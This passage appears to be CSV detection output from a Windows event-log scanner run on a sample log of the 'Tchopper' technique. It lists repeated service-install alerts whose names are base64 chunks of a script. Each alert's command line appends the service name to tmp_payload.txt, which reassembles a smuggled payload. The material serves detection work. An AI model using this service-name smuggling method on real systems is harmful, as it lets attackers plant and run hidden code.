start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:16:27.853 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: QWRkKCJPU1ZlcnNpb24iLCAkT1NWZXJzaW9uKQ0KDQogICAgICAgICRMb2dJbmZvLkFkZCgiVG90YWxFdmVudHMiLCAkVG90YWxMb2dFdmVudHMpDQoNCiAgICAgICAgJExvZ0luZm8uQWRkKCJBdm | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg51"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:16:29.297 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: VyYWdlRXZlbnRzIiwgJEF2Z0V2ZW50c1BlclNlY29uZCkNCg0KICAgICAgICBSZXR1cm4gJExvZ0luZm8NCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgDQogICAgIH0NCiAgICAgDQog | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg52"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:16:29.297 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: VyYWdlRXZlbnRzIiwgJEF2Z0V2ZW50c1BlclNlY29uZCkNCg0KICAgICAgICBSZXR1cm4gJExvZ0luZm8NCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgDQogICAgIH0NCiAgICAgDQog | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg52"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:16:29.297 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: VyYWdlRXZlbnRzIiwgJEF2Z0V2ZW50c1BlclNlY29uZCkNCg0KICAgICAgICBSZXR1cm4gJExvZ0luZm8NCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgDQogICAgIH0NCiAgICAgDQog | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg52"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:16:30.766 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: ICAgIGNhdGNoIHsNCg0KICAgICAgICBXcml0ZS1Mb2cgJEVSUk9SX0xPRyAiVW5hYmxlIHRvIHNjYW4gJEFnZW50IGV2ZW50IGxvZ3MiDQoNCiAgICAgICAgV3JpdGUtTG9nICRFUlJPUl9MT0cgJE | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg53"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:16:30.766 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: ICAgIGNhdGNoIHsNCg0KICAgICAgICBXcml0ZS1Mb2cgJEVSUk9SX0xPRyAiVW5hYmxlIHRvIHNjYW4gJEFnZW50IGV2ZW50IGxvZ3MiDQoNCiAgICAgICAgV3JpdGUtTG9nICRFUlJPUl9MT0cgJE | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg53"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:16:30.766 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: ICAgIGNhdGNoIHsNCg0KICAgICAgICBXcml0ZS1Mb2cgJEVSUk9SX0xPRyAiVW5hYmxlIHRvIHNjYW4gJEFnZW50IGV2ZW50IGxvZ3MiDQoNCiAgICAgICAgV3JpdGUtTG9nICRFUlJPUl9MT0cgJE | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg53"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:16:32.227 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: Vycm9yWzBdDQoNCiAgICAgICAgJEVycm9yTGluZU51bWJlciA9ICRFcnJvclswXS5JbnZvY2F0aW9uSW5mby5zY3JpcHRsaW5lbnVtYmVyDQoNCiAgICAgICAgV3JpdGUtTG9nICRFUlJPUl9MT0cg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg54"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:16:32.227 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: Vycm9yWzBdDQoNCiAgICAgICAgJEVycm9yTGluZU51bWJlciA9ICRFcnJvclswXS5JbnZvY2F0aW9uSW5mby5zY3JpcHRsaW5lbnVtYmVyDQoNCiAgICAgICAgV3JpdGUtTG9nICRFUlJPUl9MT0cg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg54"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:16:32.227 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: Vycm9yWzBdDQoNCiAgICAgICAgJEVycm9yTGluZU51bWJlciA9ICRFcnJvclswXS5JbnZvY2F0aW9uSW5mby5zY3JpcHRsaW5lbnVtYmVyDQoNCiAgICAgICAgV3JpdGUtTG9nICRFUlJPUl9MT0cg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg54"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:16:33.680 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: IkNhdWdodCBvbiBsaW5lIG51bWJlcjogJEVycm9yTGluZU51bWJlciINCg0KICAgICAgICBjb250aW51ZQ0KICAgIH0NCn0NCg0KDQojIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg55"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:16:33.680 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: IkNhdWdodCBvbiBsaW5lIG51bWJlcjogJEVycm9yTGluZU51bWJlciINCg0KICAgICAgICBjb250aW51ZQ0KICAgIH0NCn0NCg0KDQojIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg55"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:16:33.680 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: IkNhdWdodCBvbiBsaW5lIG51bWJlcjogJEVycm9yTGluZU51bWJlciINCg0KICAgICAgICBjb250aW51ZQ0KICAgIH0NCn0NCg0KDQojIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg55"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:16:35.189 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: MjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjDQojRnVuY3Rpb24gd2lsbCBnZW5lcmF0ZSBvdXRwdXQgaW5mbyBmb3IgdGhlIGdpdmVu | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg56"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:16:35.189 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: MjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjDQojRnVuY3Rpb24gd2lsbCBnZW5lcmF0ZSBvdXRwdXQgaW5mbyBmb3IgdGhlIGdpdmVu | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg56"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:16:35.189 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: MjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjDQojRnVuY3Rpb24gd2lsbCBnZW5lcmF0ZSBvdXRwdXQgaW5mbyBmb3IgdGhlIGdpdmVu | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg56"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:16:36.641 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: IGxvZyBldmVudHMgcGVyIHNlY29uZA0KDQojQHBhcmFtICRUb3RhbExvZ0V2ZW50cyAtPiAgVGhlIHRvdGFsICMgb2YgZXZlbnRzIGZvciB0aGUgZ2l2ZW4gbG9nDQoNCiMjIyMjIyMjIyMjIyMjIy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg57"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:16:36.641 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: IGxvZyBldmVudHMgcGVyIHNlY29uZA0KDQojQHBhcmFtICRUb3RhbExvZ0V2ZW50cyAtPiAgVGhlIHRvdGFsICMgb2YgZXZlbnRzIGZvciB0aGUgZ2l2ZW4gbG9nDQoNCiMjIyMjIyMjIyMjIyMjIy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg57"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:16:36.641 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: IGxvZyBldmVudHMgcGVyIHNlY29uZA0KDQojQHBhcmFtICRUb3RhbExvZ0V2ZW50cyAtPiAgVGhlIHRvdGFsICMgb2YgZXZlbnRzIGZvciB0aGUgZ2l2ZW4gbG9nDQoNCiMjIyMjIyMjIyMjIyMjIy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg57"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:16:38.089 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: MjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMNCg0KZnVuY3Rpb24gR2V0LVByb2ZpbGVTdWdnZXN0 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg58"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:16:38.089 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: MjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMNCg0KZnVuY3Rpb24gR2V0LVByb2ZpbGVTdWdnZXN0 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg58"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:16:38.089 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: MjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMNCg0KZnVuY3Rpb24gR2V0LVByb2ZpbGVTdWdnZXN0 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg58"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:16:39.555 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: aW9uIHsgcGFyYW0oJEF2Z0V2ZW50c1BlclNlY29uZCkNCg0KICAgIHRyeSB7DQoNCiAgICAgICAgICNQcm9maWxlIHN1Z2VzdGlvbg0KICAgICAgICAgJExvZ1N0YXRzQW5kSW5mbyA9ICIiDQoNCg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg59"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:16:39.555 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: aW9uIHsgcGFyYW0oJEF2Z0V2ZW50c1BlclNlY29uZCkNCg0KICAgIHRyeSB7DQoNCiAgICAgICAgICNQcm9maWxlIHN1Z2VzdGlvbg0KICAgICAgICAgJExvZ1N0YXRzQW5kSW5mbyA9ICIiDQoNCg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg59"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:16:39.555 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: aW9uIHsgcGFyYW0oJEF2Z0V2ZW50c1BlclNlY29uZCkNCg0KICAgIHRyeSB7DQoNCiAgICAgICAgICNQcm9maWxlIHN1Z2VzdGlvbg0KICAgICAgICAgJExvZ1N0YXRzQW5kSW5mbyA9ICIiDQoNCg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg59"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:16:41.021 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: 0KICAgICAgICBJZiAoJEF2Z0V2ZW50c1BlclNlY29uZCAtR0UgMCAtYW5kICRBdmdFdmVudHNQZXJTZWNvbmQgLUxFIDEwMCkgew0KICAgICAgICAgDQogICAgICAgICAgICAkTG9nU3RhdHNBbmRJ | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg60"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:16:41.021 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: 0KICAgICAgICBJZiAoJEF2Z0V2ZW50c1BlclNlY29uZCAtR0UgMCAtYW5kICRBdmdFdmVudHNQZXJTZWNvbmQgLUxFIDEwMCkgew0KICAgICAgICAgDQogICAgICAgICAgICAkTG9nU3RhdHNBbmRJ | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg60"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:16:41.021 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: 0KICAgICAgICBJZiAoJEF2Z0V2ZW50c1BlclNlY29uZCAtR0UgMCAtYW5kICRBdmdFdmVudHNQZXJTZWNvbmQgLUxFIDEwMCkgew0KICAgICAgICAgDQogICAgICAgICAgICAkTG9nU3RhdHNBbmRJ | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg60"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:16:42.474 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: bmZvICs9ICJNU1JQQyAoMC0xMDApIEVQUyBvciBXaW5Db2xsZWN0IERlZmF1bHQgKEVuZHBvaW50KSAoMC01MCkgRVBTYG4iICAgICAgICAgDQogICAgICAgICB9DQogICAgICAgICANCiAgICAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg61"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:16:42.474 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: bmZvICs9ICJNU1JQQyAoMC0xMDApIEVQUyBvciBXaW5Db2xsZWN0IERlZmF1bHQgKEVuZHBvaW50KSAoMC01MCkgRVBTYG4iICAgICAgICAgDQogICAgICAgICB9DQogICAgICAgICANCiAgICAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg61"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:16:42.474 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: bmZvICs9ICJNU1JQQyAoMC0xMDApIEVQUyBvciBXaW5Db2xsZWN0IERlZmF1bHQgKEVuZHBvaW50KSAoMC01MCkgRVBTYG4iICAgICAgICAgDQogICAgICAgICB9DQogICAgICAgICANCiAgICAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg61"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:16:43.938 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: AgIyBBYm92ZSBIaWdoIEhhdGUNCiAgICAgICAgIElmICgkQXZnRXZlbnRzUGVyU2Vjb25kIC1HVCA2MjUpIHsgDQogICAgICAgICAgICANCiAgICAgICAgICAgICRMb2dTdGF0c0FuZEluZm8gKz0g | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg62"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:16:43.938 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: AgIyBBYm92ZSBIaWdoIEhhdGUNCiAgICAgICAgIElmICgkQXZnRXZlbnRzUGVyU2Vjb25kIC1HVCA2MjUpIHsgDQogICAgICAgICAgICANCiAgICAgICAgICAgICRMb2dTdGF0c0FuZEluZm8gKz0g | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg62"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:16:43.938 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: AgIyBBYm92ZSBIaWdoIEhhdGUNCiAgICAgICAgIElmICgkQXZnRXZlbnRzUGVyU2Vjb25kIC1HVCA2MjUpIHsgDQogICAgICAgICAgICANCiAgICAgICAgICAgICRMb2dTdGF0c0FuZEluZm8gKz0g | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg62"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:16:45.441 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: IlN1Z2dlc3RlZCBQcm9maWxlOiBIaWdoIEV2ZW50IFJhdGUgU2VydmVyICgyNTEtNjI1KSBFUFMiDQogICAgICAgICAgICAjJExvZ1N0YXRzQW5kSW5mbyArPSAiTk9URTogTG9nIEV2ZW50IFJhdG | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg63"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:16:45.441 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: IlN1Z2dlc3RlZCBQcm9maWxlOiBIaWdoIEV2ZW50IFJhdGUgU2VydmVyICgyNTEtNjI1KSBFUFMiDQogICAgICAgICAgICAjJExvZ1N0YXRzQW5kSW5mbyArPSAiTk9URTogTG9nIEV2ZW50IFJhdG | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg63"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:16:45.441 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: IlN1Z2dlc3RlZCBQcm9maWxlOiBIaWdoIEV2ZW50IFJhdGUgU2VydmVyICgyNTEtNjI1KSBFUFMiDQogICAgICAgICAgICAjJExvZ1N0YXRzQW5kSW5mbyArPSAiTk9URTogTG9nIEV2ZW50IFJhdG | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg63"" | select -Expand DisplayName |out-file -append 